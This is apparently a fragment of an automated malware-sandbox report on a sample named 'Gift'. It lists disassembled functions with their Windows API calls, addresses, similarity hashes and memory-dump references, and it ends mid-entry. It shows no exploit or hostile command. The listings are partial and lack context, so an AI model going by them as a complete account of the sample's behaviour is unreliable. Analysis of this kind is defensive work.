                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 443d8aeeff5c9cc171ea8c0f5d598f7c4545a10b541ca2bb63997c23e73cbc0f
                                                                          • Instruction ID: 3efde7abbd37329c12c187c53a9637b7460570ee103543a6eb10855f8fbab211
                                                                          • Opcode Fuzzy Hash: 443d8aeeff5c9cc171ea8c0f5d598f7c4545a10b541ca2bb63997c23e73cbc0f
                                                                          • Instruction Fuzzy Hash: 56111879901228FFEB11DF99CD85FADBBB8FB48710F204096EA04B7290D6716E11DB94
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                          • GetStockObject.GDI32(00000011), ref: 002D2163
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                          • String ID:
                                                                          • API String ID: 3970641297-0
                                                                          • Opcode ID: 38e3ca6f556509a7e6f2e9445f72cf4f52aeb9c6c85854945ecbcd10b73bb619
                                                                          • Instruction ID: 8d3d090f8c1db8d1b5174e64d7084a61c05ea5d0cc0b04893611c14852cca874
                                                                          • Opcode Fuzzy Hash: 38e3ca6f556509a7e6f2e9445f72cf4f52aeb9c6c85854945ecbcd10b73bb619
                                                                          • Instruction Fuzzy Hash: C3118B72111209FFDB064F90DC85EEBBB6DEF68354F048112FA0852261C771DC60DBA0
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 0033195E
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 00331983
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 0033198D
                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 003319C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: 9f10972589b767e1962ba1a49b50849a3fc0ec8ab956d74c877b7910cf8fe1ee
                                                                          • Instruction ID: 9d9c3760513f848116b3d0a4de4b23052092c15e77bc95b6fdd7394f7ab734b7
                                                                          • Opcode Fuzzy Hash: 9f10972589b767e1962ba1a49b50849a3fc0ec8ab956d74c877b7910cf8fe1ee
                                                                          • Instruction Fuzzy Hash: 61112731D0462DDBCF069FE5D999BEEBB78FF0A751F018195E980B2240CB7096608BD1
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0035E1EA
                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0035E201
                                                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0035E216
                                                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0035E234
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                          • String ID:
                                                                          • API String ID: 1352324309-0
                                                                          • Opcode ID: 74afcaf41631206b12a998277da84e45be105f42af623baa50d97fabe0e20b42
                                                                          • Instruction ID: 3c7a39e6c8020a4f393d8fc545681cadb186ada8b1981dbfd142aba22ed76362
                                                                          • Opcode Fuzzy Hash: 74afcaf41631206b12a998277da84e45be105f42af623baa50d97fabe0e20b42
                                                                          • Instruction Fuzzy Hash: DB1161B52053049BE3369F51DD09F93BBBCEF00B05F108D59AA26D6464DBB0E6089FA2
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: 5ad0319e6345dba77020f4690f46811e634fd116f9b2fd0c54ece2ff1fc7fbb4
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: 1E019E3284914EBBCF135E84CC21CEE3F2ABB19340B098915FA1858171C336E9B1AB81
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 0035B956
                                                                          • ScreenToClient.USER32(?,?), ref: 0035B96E
                                                                          • ScreenToClient.USER32(?,?), ref: 0035B992
                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0035B9AD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: 1e3baadde880529acb6c77de9a50f941bbfe8ce10a29d8b3d82291ea2e00c307
                                                                          • Instruction ID: 78cd0b482f777a112dc04ec102dd69dab16f11adbb07a5bbef794b7b2a767af8
                                                                          • Opcode Fuzzy Hash: 1e3baadde880529acb6c77de9a50f941bbfe8ce10a29d8b3d82291ea2e00c307
                                                                          • Instruction Fuzzy Hash: EA1163B9D04209EFDB41CF98C885AEEFBF9FB48310F108156E914E3220D771AA658F50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0035BCB6
                                                                          • _memset.LIBCMT ref: 0035BCC5
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00398F20,00398F64), ref: 0035BCF4
                                                                          • CloseHandle.KERNEL32 ref: 0035BD06
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3277943733-0
                                                                          • Opcode ID: 7c39be4abbcf79a7be1362cddf202427bb2639ede4154e9d331a045c6411469f
                                                                          • Instruction ID: 14a906283d947b9b755c332763394fccc53becbafb9e724fa2c828731aa30fd0
                                                                          • Opcode Fuzzy Hash: 7c39be4abbcf79a7be1362cddf202427bb2639ede4154e9d331a045c6411469f
                                                                          • Instruction Fuzzy Hash: 95F05EB65503087FF6527B61BC06FBB7A5DEB4A751F005422FA09D51A2DBB2481087A8
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 003371A1
                                                                            • Part of subcall function 00337C7F: _memset.LIBCMT ref: 00337CB4
                                                                          • _memmove.LIBCMT ref: 003371C4
                                                                          • _memset.LIBCMT ref: 003371D1
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003371E1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                          • String ID:
                                                                          • API String ID: 48991266-0
                                                                          • Opcode ID: 0f503bc0b4e6697bea931015d09fadcaad15ed2b358c84481a8cb55a478825e9
                                                                          • Instruction ID: bd93f0a4ed62fe41f24b61c5138acbaf7e307822386ff1eb6d264a7f469923b4
                                                                          • Opcode Fuzzy Hash: 0f503bc0b4e6697bea931015d09fadcaad15ed2b358c84481a8cb55a478825e9
                                                                          • Instruction Fuzzy Hash: 37F0547A100104ABCF026F55DCC5B5AFB29EF45360F04C065FE085E21ACB71A921DBB4
                                                                          APIs
                                                                            • Part of subcall function 002D16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D1729
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1738
                                                                            • Part of subcall function 002D16CF: BeginPath.GDI32(?), ref: 002D174F
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1778
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035C3E8
                                                                          • LineTo.GDI32(00000000,?,?), ref: 0035C3F5
                                                                          • EndPath.GDI32(00000000), ref: 0035C405
                                                                          • StrokePath.GDI32(00000000), ref: 0035C413
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 1539411459-0
                                                                          • Opcode ID: a0f281544a282a32e73d49ecc174acf4db80d2716c913341fe32eb7a06322385
                                                                          • Instruction ID: 657f35c51e5578ff041e69afb5ad5b47b87c7eaec98377a138cbe7bede7fa456
                                                                          • Opcode Fuzzy Hash: a0f281544a282a32e73d49ecc174acf4db80d2716c913341fe32eb7a06322385
                                                                          • Instruction Fuzzy Hash: C2F0B832009258BBDB232F52AC0EFCE3F5DAF06311F048000FA11211E287B65964DFA9
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032AA6F
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0032AA82
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0032AA89
                                                                          • AttachThreadInput.USER32(00000000), ref: 0032AA90
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: deda3d281104c539968ad1012ed1ee033d7128091cf5b5186838d8edeb86f68f
                                                                          • Instruction ID: 2d22f039705f5183babeba3280a17cfe451a5e503016b4b990922c275299e20c
                                                                          • Opcode Fuzzy Hash: deda3d281104c539968ad1012ed1ee033d7128091cf5b5186838d8edeb86f68f
                                                                          • Instruction Fuzzy Hash: 64E0C931545228BBDB225FA2ED0EEEB7F5CEF167A2F008015F50995090C6B58560CBA1
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 002D260D
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 002D2617
                                                                          • SetBkMode.GDI32(?,00000001), ref: 002D262C
                                                                          • GetStockObject.GDI32(00000005), ref: 002D2634
                                                                          • GetWindowDC.USER32(?,00000000), ref: 0030C1C4
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0030C1D1
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0030C1EA
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0030C203
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0030C223
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0030C22E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 1946975507-0
                                                                          • Opcode ID: b091b1748266056335f1da71d98428920ba70315c1619a93987bdc4aba3d164b
                                                                          • Instruction ID: 64763d75d9f0533fcd81e8fe181e96af8fa8572734df8c41ac6f68bd11107583
                                                                          • Opcode Fuzzy Hash: b091b1748266056335f1da71d98428920ba70315c1619a93987bdc4aba3d164b
                                                                          • Instruction Fuzzy Hash: B2E06531504244BBDF275F74AC0A7D93B19EB16332F04C366FA69480E187B14994DB11
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 00329339
                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00328F04), ref: 00329340
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00328F04), ref: 0032934D
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00328F04), ref: 00329354
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                          • String ID:
                                                                          • API String ID: 3974789173-0
                                                                          • Opcode ID: efc7acc51c8a4f2d7b7cd8698389b9ff3022d05db3621b551df0ab5713daecc4
                                                                          • Instruction ID: 5e9a038dec0d219e8e7489b61d520879b1e23a7ae4d2095f110f61c4e94200b2
                                                                          • Opcode Fuzzy Hash: efc7acc51c8a4f2d7b7cd8698389b9ff3022d05db3621b551df0ab5713daecc4
                                                                          • Instruction Fuzzy Hash: 61E04F36601221ABD7665FF16D0EB573B6CAF50792F118818E245C9090E6B49444C754
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 00310679
                                                                          • GetDC.USER32(00000000), ref: 00310683
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003106A3
                                                                          • ReleaseDC.USER32(?), ref: 003106C4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: 6761e8f94f2387b217b262d6da756635fa4a528a719e761713e439f39a23f27a
                                                                          • Instruction ID: 96ee1f26ed3b043224b62be05c478efc62acc05b429ef7bfd7aaf1942124f56d
                                                                          • Opcode Fuzzy Hash: 6761e8f94f2387b217b262d6da756635fa4a528a719e761713e439f39a23f27a
                                                                          • Instruction Fuzzy Hash: B2E01A71800204EFCB069F60D809A9E7BF9EB8C310F11C006F85AA7350DBF885A19F54
                                                                          APIs
                                                                          • GetDesktopWindow.USER32 ref: 0031068D
                                                                          • GetDC.USER32(00000000), ref: 00310697
                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003106A3
                                                                          • ReleaseDC.USER32(?), ref: 003106C4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                          • String ID:
                                                                          • API String ID: 2889604237-0
                                                                          • Opcode ID: ffe24f4c63c9066dc39dbe68a5e01a766d89f3656b040003295afb670fcaf944
                                                                          • Instruction ID: 7e84d44abdc329af102cd6497532b9e535d62c17cda28191e90a16fcc5471351
                                                                          • Opcode Fuzzy Hash: ffe24f4c63c9066dc39dbe68a5e01a766d89f3656b040003295afb670fcaf944
                                                                          • Instruction Fuzzy Hash: 78E01A71800204AFCB069F60D80965E7BF9EB8C310F10C005F959A7350DBB895518F50
                                                                          APIs
                                                                            • Part of subcall function 002E436A: _wcscpy.LIBCMT ref: 002E438D
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • __wcsnicmp.LIBCMT ref: 0033B670
                                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0033B739
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                          • String ID: LPT
                                                                          • API String ID: 3222508074-1350329615
                                                                          • Opcode ID: 98c4510a0c417a674d0b877b84274512a84ccdcd5ce9b3c875af7642046703de
                                                                          • Instruction ID: d320786fdc30837f782b1c881f457a50d1232ef765330b00e077a4c1ebc0ca26
                                                                          • Opcode Fuzzy Hash: 98c4510a0c417a674d0b877b84274512a84ccdcd5ce9b3c875af7642046703de
                                                                          • Instruction Fuzzy Hash: F3616175A10219EFCB15EF54C895EAEF7B9EF48310F11805AFA46AB391D770AE40CB90
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: #V.
                                                                          • API String ID: 4104443479-4118664886
                                                                          • Opcode ID: 70357fc346a33c92f172ec596bdd715ac294f05524626cfc98d91d41265d2580
                                                                          • Instruction ID: 88f190a50f1431c1e19c969ed2d828501230e3e88a9436ef14969ba4205dd84b
                                                                          • Opcode Fuzzy Hash: 70357fc346a33c92f172ec596bdd715ac294f05524626cfc98d91d41265d2580
                                                                          • Instruction Fuzzy Hash: EF516170D10609DFCF2ACFA8C890AEEB7B5FF44304F154529E85AD7250E731A996CB51
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 002DE01E
                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 002DE037
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemorySleepStatus
                                                                          • String ID: @
                                                                          • API String ID: 2783356886-2766056989
                                                                          • Opcode ID: c4517981f676935068cd6eb5a381f8fac4f1f19f4d3c34d2199c1f38acd6c3b5
                                                                          • Instruction ID: 8a4a49f7da75f6fc895e1f766ae8d3d2aa5c2094ed0b884383762466d860d138
                                                                          • Opcode Fuzzy Hash: c4517981f676935068cd6eb5a381f8fac4f1f19f4d3c34d2199c1f38acd6c3b5
                                                                          • Instruction Fuzzy Hash: 1D5158714187449BE321AF54E886BABBBF8FB84314F51884EF1D8412A1DB709978CB26
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00358186
                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0035819B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
